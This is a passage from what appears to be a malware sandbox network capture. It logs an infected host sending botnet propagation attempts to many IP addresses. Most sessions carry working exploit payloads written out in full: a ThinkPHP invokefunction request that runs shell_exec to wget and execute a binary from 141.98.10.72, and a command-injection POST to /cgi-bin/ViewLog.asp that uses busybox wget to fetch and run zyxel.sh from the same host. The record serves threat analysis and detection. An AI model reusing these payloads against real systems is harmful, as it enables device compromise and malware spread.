                                                      Feb 14, 2024 09:29:27.486074924 CET82INData Raw: 50 72 61 67 6d 61 3a 20 6e 6f 2d 63 61 63 68 65 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 63 61 63 68 65 2c 20 6e 6f 2d 73 74 6f 72 65 2c 20 6d 75 73 74 2d 72 65 76 61 6c 69 64 61 74 65 0d 0a
                                                      Data Ascii: Pragma: no-cacheCache-Control: no-cache, no-store, must-revalidate
                                                      Feb 14, 2024 09:29:27.486085892 CET37INData Raw: 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 0d 0a
                                                      Data Ascii: Content-Type: text/html
                                                      Feb 14, 2024 09:29:27.486104012 CET41INData Raw: 58 2d 46 72 61 6d 65 2d 4f 70 74 69 6f 6e 73 3a 20 53 41 4d 45 4f 52 49 47 49 4e 0d 0a
                                                      Data Ascii: X-Frame-Options: SAMEORIGIN
                                                      Feb 14, 2024 09:29:27.486115932 CET44INData Raw: 58 2d 58 53 53 2d 50 72 6f 74 65 63 74 69 6f 6e 3a 31 3b 20 6d 6f 64 65 3d 62 6c 6f 63 6b 0d 0a
                                                      Data Ascii: X-XSS-Protection:1; mode=block
                                                      Feb 14, 2024 09:29:27.486128092 CET44INData Raw: 58 2d 43 6f 6e 74 65 6e 74 2d 54 79 70 65 2d 4f 70 74 69 6f 6e 73 3a 6e 6f 73 6e 69 66 66 0d 0a
                                                      Data Ascii: X-Content-Type-Options:nosniff
                                                      Feb 14, 2024 09:29:27.486140966 CET30INData Raw: 46 65 61 74 75 72 65 2d 50 6f 6c 69 63 79 3a 20 0d 0a
                                                      Data Ascii: Feature-Policy:
                                                      Feb 14, 2024 09:29:27.486152887 CET71INData Raw: 53 74 72 69 63 74 2d 54 72 61 6e 73 70 6f 72 74 2d 53 65 63 75 72 69 74 79 3a 20 6d 61 78 2d 61 67 65 3d 33 30 30 3b 20 69 6e 63 6c 75 64 65 53 75 62 44 6f 6d 61 69 6e 73 0d 0a
                                                      Data Ascii: Strict-Transport-Security: max-age=300; includeSubDomains
                                                      Feb 14, 2024 09:29:27.486165047 CET40INData Raw: 58 2d 44 6f 77 6e 6c 6f 61 64 2d 4f 70 74 69 6f 6e 73 3a 20 6e 6f 6f 70 65 6e 0d 0a
                                                      Data Ascii: X-Download-Options: noopen
                                                      Feb 14, 2024 09:29:27.486179113 CET347INData Raw: 58 2d 50 65 72 6d 69 74 74 65 64 2d 43 72 6f 73 73 2d 44 6f 6d 61 69 6e 2d 50 6f 6c 69 63 69 65 73 3a 20 6d 61 73 74 65 72 2d 6f 6e 6c 79 0d 0a 52 65 66 65 72 72 65 72 2d 50 6f 6c 69 63 79 3a 20 6e 6f 2d 72 65 66 65 72 72 65 72 2d 77 68 65 6e 2d
                                                      Data Ascii: X-Permitted-Cross-Domain-Policies: master-onlyReferrer-Policy: no-referrer-when-downgradeLast-Modified: Location: https://112.200.187.9<html><head></head><body>This document has moved to a new <a href="https://112.200.187.9">loca


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      245192.168.2.1534188112.213.39.9580
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:29:27.776715994 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: /
                                                      User-Agent: Uirusu/2.0
                                                      Feb 14, 2024 09:29:28.083549023 CET502INHTTP/1.1 400 Bad Request
                                                      Content-Type: text/html; charset=us-ascii
                                                      Server: Microsoft-HTTPAPI/2.0
                                                      Date: Wed, 14 Feb 2024 08:29:27 GMT
                                                      Connection: close
                                                      Content-Length: 311
                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 30 2e 20 54 68 65 20 72 65 71 75 65 73 74 20 69 73 20 62 61 64 6c 79 20 66 6f 72 6d 65 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Bad Request</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Bad Request</h2><hr><p>HTTP Error 400. The request is badly formed.</p></BODY></HTML>


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      246192.168.2.1539526112.60.15.22480
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:29:28.156474113 CET319OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: /
                                                      User-Agent: Uirusu/2.0
                                                      Feb 14, 2024 09:29:28.537240982 CET293INHTTP/1.1 400 Bad Request
                                                      Server: stgw
                                                      Date: Wed, 14 Feb 2024 08:29:28 GMT
                                                      Content-Type: text/html
                                                      Content-Length: 149
                                                      Connection: close
                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 73 74 67 77 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                      Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>stgw</center></body></html>


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      247192.168.2.155174485.84.232.1998080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:29:29.254918098 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:29:29.499011993 CET145INHTTP/1.1 401 Unauthorized
                                                      WWW-Authenticate: Basic realm="Network Camera"
                                                      Content-Type: text/html
                                                      Server: Network Camera
                                                      Connection: close


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      248192.168.2.153801895.87.234.1498080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:29:29.276118994 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:29:30.458193064 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:29:31.838042974 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:29:34.745981932 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:29:40.377816916 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:29:51.385518074 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:30:14.680972099 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:30:59.735516071 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      249192.168.2.154667094.122.19.118080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:29:29.297808886 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      250192.168.2.153762494.121.122.338080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:29:29.297866106 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      251192.168.2.155751694.123.47.1938080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:29:29.299700975 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      252192.168.2.153972295.86.70.1288080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:29:29.306143999 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      253192.168.2.153720831.136.66.2478080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:29:29.460300922 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:29:30.106105089 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:29:31.354218960 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:29:33.978178024 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:29:39.097974062 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:29:49.081717968 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:30:10.584954023 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:30:51.543868065 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      254192.168.2.1553166112.221.133.9180
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:29:29.476152897 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: /
                                                      User-Agent: Uirusu/2.0
                                                      Feb 14, 2024 09:29:29.790294886 CET307INHTTP/1.1 400 Bad Request
                                                      Server: nginx
                                                      Date: Wed, 14 Feb 2024 08:29:29 GMT
                                                      Content-Type: text/html
                                                      Content-Length: 150
                                                      Connection: close
                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                      Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      255192.168.2.155354431.136.171.2258080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:29:29.478622913 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:29:30.106103897 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
